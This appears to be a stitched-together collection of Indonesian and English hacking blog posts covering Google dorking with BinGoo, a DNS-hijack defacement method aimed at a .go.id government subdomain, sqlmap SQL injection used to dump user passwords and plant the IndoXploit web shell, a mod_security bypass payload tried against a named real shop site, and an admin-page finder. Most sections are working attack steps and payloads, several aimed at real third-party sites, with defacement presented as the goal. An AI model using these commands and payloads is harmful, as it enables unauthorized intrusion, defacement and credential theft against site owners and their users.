Tutorial Tool Untuk Dorking Menggunakan Bingoo

Assalamualaikum , sudah sekian lama tidak ngepost blog kali ini saya dikasi kesempatan untuk Mengepost blog Kembali ..


Oke Langsung saja , Pertama agan Download dulu Binggo Nya Disini

Sebelum mempraktekkannya, Disini syarat untuk menggunakan Binggo Adalah Kalian harus menggunakan Linux atau sejenisnya..
Yang penting OS anda sangat mendukung File ini , karena file ini berbahasa Pemograman bash ..

Ke Dua : Sekarang install Lynx dan Curl dengan command
apt-get install Lynx
apt-get install curl

Jika sudah selesai install curl dan Lynx sekarang agan tinggal Menginstallnya ..

Disini saya menginstall BinGoo di server ssh , Atau Server yang saya buka melalui Putty ..

Contoh saya akan meletakkan File Bingo di Folder saya anggap saja folder saya bernama CoupDeGrace
Maka agan tinggal mengetikkan mkdir CoupDeGrace ..

Lalu letakkin File Bingoo nya ,Di folder tadi :D biar tidak berantakan jadinya ..

lalu estrack foldernya dengan command unzip Bingoo-Master.zip .

Jika Sudah , Sekarang Kita tinggal menjalankan file bingonya ..

Jika file Bingoo berwarna hijau makan kamu tidak perlu memberi command chmod , tinggal langsung menjalankan saja

dengan command ./bingoo

Kalau sudah akan keluar tampilan Seperti ini..

Disini kamu bisa menggunakan Option mana pun , dalam kasus ini saya akan mengambil options 1..
ketikkan 1 lalu Enter

Nah nanti akan keluar Options lagi, kalian mau memakai Single scan atau Mass dork scan , Oke saya akan mengambil Options 1 yaitu single dork scan. Lalu tekan ENTER

Jika sudah , Maka akan keluar tulisan Please provide Google dork to use:

Disana kamu Bisa memasukkan Dork , contoh saya menggunakan dork .php?id=

 SCREENSHOT:

Kemudian tekan Enter  Maka akan keluar seperti ini 

Sekian dari saya :D :D :D , Mungkin saja berguna :D

Kalau bingung bisa Kalian Comment di Blog saya ini :D

Selamat malam, Assalamualaikum :D

Cara Deface Metode DNS Affraid

Oke, sekarang ane mau ngasih tutor DNS Afraid yang sangat heboh di dunia hacking wkwkwk
Pertama lu harus Daftar akun di: 000webhost
dan afraid.org 

Step 1
Kalau udah lu buat web di 00webhost


1. Go to Cpanel  

 

2. Buat index.php di FILE MANAGER "Public_html/upload/"

  

 3.Go to Park Domain 

 

Step 2
Masuk ke afraid.org 

 

1.Klik Subdomains

 

*ada dropbox klik "many many more available"

2.Klik "Shared Domain Registry"

 3.Lalu Cari / Share *misal: .go.id

4.Pilih targetnya lalu klik dan kalian akan masuk ke Add a new subdomain

5.Isi Data Dengan Seperti ini

 Type : NS

Subdomain : forums,info,data,profile seterah ente,ane ambil contoh Members

 domain : bengkayang.go.id (private) #ngga usah lu ganti lagi
Destination: "ns01.000webhost.com" atau "ns02.000webhost.com" (*) biasa nya yang "ns01.000webhost.com"
TTL : kosongin
Wildcard: (*) klik Centang
JADI ISI SEPERTI INI : 

  

6.Save.

Step 3

1.Go to park domain di 00webhost  

*jika sudah terdaftar disub domain anda seperti ini:

2.dan masuk kan domain yang tadi members.bengkayang.go.id 

3.Lalu klik park domain
4.Ada tulisan
"Domain [Domainanda] has been parked on top of [blabla] . The most important thing is that now you need to update nameservers of domain Domainanda to ns01.000webhost.com, ns02.000webhost.com
If you will not update nameservers, domain will be unparked in 7 days automatically." dan klik back park domain
4.Berarti Sucses dan tunggu beberapa menit lalu buka Taraaaa...

Cara Hack Website dengan Metode Upload Shell menggunakan Sqlmap

 

Cara Hack Website dengan Metode Upload Shell menggunakan Sqlmap

Halo sobat dytrac0ders, kemarin Saya sudah mengajarkan sobat Cara Meretas Website dengan menggunakan Sqlmap . Kita bisa login dengan username & password yang kita dapatkan ke website korban melalui username & password yang kita panen lewat sqlmap.

Namun terkadang ada kasus dimana kita tidak bisa login menggunakan username dan password yang kita dapatkan. Dan kalaupun kita berhasil login dengan username & password tersebut, kita kesulitan untuk mencari form upload, bahkan mungkin memang tidak ada form uploadnya untuk mengupload shell.

Nah untuk tutorial ini Saya akan mengajarkan sobat cara mengupload shell hanya dengan menggunakan sqlmap. Ya, hanya dengan menggunakan sqlmap. Tidak percaya? Simak saja tutorial ini sampai selesai

Bagaimana Cara Kerja Metode Ini? 

• Dalam Sistem Database, ada user yang harus terdaftar pada Sistem Database untuk dapat mengakses database. Masing-masing user memiliki hak akses yang berbeda. 
• Ada yang hanya bisa membaca data pada database, juga ada yang bisa memanipulasi isi database. Nah, sobat tahu siapa yang memiliki hak untuk memberikan hak akses kepada user-user tersebut? Dialah si admin atau biasa disebut DBA (Database Administrator). 
• DBA merupakan user yang istilahnya lebih tinggi daripada user-user lainnya. DBA tidak hanya dapat memberikan hak akses serta memanipulasi isi data pada database, namun DBA juga memiliki kemampuan dalam manajemen file. 
• Kemampuan manajemen file tersebut maksudnya si DBA dapat membuat file hanya dengan menggunakan perintah SQL! File seperti apa yang dapat dibuat oleh DBA? Apa saja bisa sobat, termasuk membuat file php untuk mengupload shell yang akan kita bahas di tutorial kali ini
• Perlu dicatat bahwa celah ini kebanyakan sudah jarang ditemukan. Namun tidak menutup kemungkinan sobat bisa menemukan celah ini pada suatu website. 

Syarat menggunakan Metode ini agar Sukses

• Memiliki celah SQL Injection
• User merupakan DBA
• Mengetahui direktori web server (Penjelasan ada dibawah bagian Tutorial)

Sebelum sobat membaca tutorial ini, pastikan sobat sudah membaca dan memahami materi dibawah ini karena materi tersebut sangat berhubungan dengan tutorial ini

• Cara Menginstall DVWA untuk Belajar Website Hacking
• Cara Hack Website menggunakan Sqlmap untuk Pemula

Alat yang harus disiapkan

• Browser (Firefox, Chrome, Opera dll)
• DVWA
• sqlmap 
• Web Shell(IndoXploit)

 

Tutorial

Seperti biasa, Saya tidak akan menggunakan website asli di internet untuk melakukan aksi peretasan ini. Saya menggunakan aplikasi web yang bernama DVWA. Jika sobat ingin mengetahui lebih lanjut tentang apa itu DVWA serta cara instalasinya, Saya sudah membuat tutorialnya disini.

• Aktifkan web server sobat
• Buka browser sobat, lalu akses http://localhost/dvwa
• Login menggunakan username admin, serta passwordnya password
  
• Pilih menu DVWA Security, kemudian atur tingkat kesulitannya menjadi Low. Lalu klik Submit
  
• Pilih menu SQL Injection, kemudian isi 1 pada textbox User ID
  
• Oke, Saya tidak akan menjelaskan bagaimana cara mendeteksi bug SQL pada suatu website, karena sudah dijelaskan pada tutorial sebelumnya
• Copy URL pada browser
  
  
• Buka terminal atau command prompt sobat (pastikan masuk sebagai root atau administrator)
• Mari kita mulai bersqlmap! Mari kita cek apakah user merupakan DBA, dengan menambahkan parameter --is-dba seperti dibawah ni
• sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --is-dba
• Pada gambar dibawah ini kita mendapatkan error 302 redirect, itu karena kita lupa menambahkan parameter --cookie.
  

  • Perlu diingat bahwa menambahkan parameter --cookie itu tidak wajib ditambahkan jika sobat ingin mencobanya pada website asli di internet

• Mari kita tambahkan parameter cookie dengan menekan tombol SHIFT+CTRL+K pada browser
  
• Ketik perintah document.cookie untuk menampilkan cookie, lalu tekan ENTER
  
• Copy cookie tersebut,lalu tambahkan ke syntax sqlmap kita
• sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; _js_datr=zJXkV8JFK0z5lp9-ZkUV2pk4; PHPSESSID=nrag18uim5ae8frgch6vap2j77" --is-dba
• Jalankan perintah diatas
• Perhatikan pada teks bagian current user is DBA. Jika nilainya False, website tersebut tidak vuln menggunakan metode ini, namun jika nilainya True,website tersebut vuln. Dan pada gambar dibawah nilainya True! Kita bisa melanjutkan serangan kita!
  
• Nah, tahap ini baru tahap yang seru
• Pada tahap dibawah ini kita akan membuat file php uploader untuk mengupload shell kita menggunakan sqlmap
• Saya menggunakan shell karya anak bangsa yaitu IndoXploit Shell yang dibuat oleh team IndXploit sendiri. Shell IndoXploit bisa didownload di tombol dibawah ini
  
  
• Oke mari kita racik perintah sqlmap kita
• Hapus parameter --is-dba , kemudian tambahkan perintah --os-shell. Dengan parameter --os-shell, sqlmap akan membuat halaman upload untuk mengupload shell kita
• sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; _js_datr=zJXkV8JFK0z5lp9-ZkUV2pk4; PHPSESSID=nrag18uim5ae8frgch6vap2j77" --os-shell
• Jalankan perintah diatas (sesuaikan dengan cookie sobat)
  
• Kita diminta untuk memilih bahasa pemograman yang didukung oleh web server kita. Karena DVWA menggunakan bahasa PHP ketik 4 atau langsung saja tekan ENTER
• Pada gambar dibawah , ada beberapa pilihan menu untuk menginputkan direktori writeable. Direktori writeable merupakan direktori/folder yang dapat diisi dengan file. Ini bagian yang susah, selain user harus DBA, kita juga harus mengetahui direktori writeable tersebut. Untuk cara mencari direktori writeable akan dijelaskan dibawah.
  
   
  • [1] Mencari direktori umum
  • [2] Menggunakan direktori sesuai keinginan kita
  • [3] Menggunakan daftar direktori sesuai keinginan ita
  • [4] Mencari direktori menggunakan metode brute force (memakan waktu yang lamma)
• Kita mengetahui bahwa direktori dimana DVWA disimpan yaitudi /var/www/html/dva, untuk sobat pengguna Windows direktori DVWA yaitu di C:\XAMPP\htdocs\dvwa
• Maka dari itu kita pilih menu [2], kemudian masukkan direktori dimana DVWA tersimpan. Lalu tekan ENTER
  
  
• Dan berhasil! kita berhasil mendapatkan shell!
  
• Sobat bisa mengeksekusi perintah linux disini, misalkan perintah ls untuk melihat isi file & folder
  
  • os-shell> ls
• Perintah ls bekerja dengan baik!
  
• Nah sobat pasti pada penasaraan kan bagaimana cara mengupload shell
• Lihat pada teks bagian yang saya highlight pada gambar dibawah ini
  
• Disitulah file uploadernya berada yaitu di http://localhost/dvwa/vulnerabilities/sqli/tmpuliaa.php
• Copy link tersebut kemudian Mari kita akses pada browser kita
• Dan voila! Berikut penampakan file uploadernya
  
• Gausa lama-lama lagi sobat, langsung saja kita upload shell IndoXploitnya!
• Nama file shell IndoXploit saya namakan indoxploit.php. Jadi kita bisa mengakses shell tersebut di http://localhost/dvwa/vulnerabilities/sqli/indoxploit.php
• Dan boomm! Kita mendapatkan akses ke shell kita!
  
• Untuk shell IndoXploit masukan passwordnya yaitu IndoXploit. Lalul tekan ENTER
• Dan boom boom boom! Sekarang terserah kita mau ngapain website ini!
  

Bagaimana cara Mengetahui Writeable Directory pada suatu Website?

Ini merupakan bagian yang sulit, karena walaupun user dalam DBMS merupakan DBA, jika kita tidak mengetahui path/directory pada website tersebut, kita tidak akan berhasil mendapatkan akses melalui metode ini. Maka dari itu untuk mencari celah ini sangat sulit dan jarang ditemukan.
Namun Saya akan mencoba menjawabnya berdasarkan pengetahuan Saya

Mari kita akses link ang memiliki celah SQLi yaitu di http://localhost/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit# 

Sobat bisa melihat errornya yaitu :

• You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Nah, Di website luar pada halaman ini,terkadang direktori web tersebut ditampilkan seperti gambar dibawah ini

SQL Injection Using Sqlmap in kali linux

SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a  linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u www.site.com/product.php?catid=5  – -dbs

when sqlmap is done, it will tell you the Mysql version and some other information about the database.

At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart –tables

The result should be something like this :
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users –columns

The result should be like this :

last step we need to get data from columns , so the final command will look like this.

sqlmap -u www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump

 and here’s the final result : we have got the name, mail and password:

[Tutorial] Bypass WAF (Mod_Security)

Assalamuallaikum sobat xVm.
Setelah sekian lama engak ngepost masalah deface, nih kita mulai singgung lagi :D

Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) , nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

1. Contoh target

http://www.harshstones.com/product-detail.php?id=35

2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "

http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 

http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error

Berarti jumlah table databasenya adalah 12

3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya

http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--

 

4. Sekarang kita bypass dengan perintah :

/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

5. Sekarang kita coba dengan site diatas :

http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--

 

Nah sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum IDCA.

Jika ada kendala silahkan kunjungi link disini

Author : AtzShahab

Admin Finder Script

Hello sobat :D
kali ini saya akan share alat untuk mencari halaman login admin di dalam suatu website :D kan percuma jika tau username dan password si admin, tetapi tidak mengetahui halaman login adminnya :D

Sebelum menggunakan adminfinder.py ?? pastika PC anda sudah terinstall PYTHON ?? jika belom ??
Download disini :
-Download Python

Okkhe sudah kan ?? langsung disedot aja :D
-Download Admin Finder [PYTHON SCRIPT]

Hacking Is Not Crime !!

#CaraMencariHalamanAdmin, #AdminLogin #SearchLoginAdmin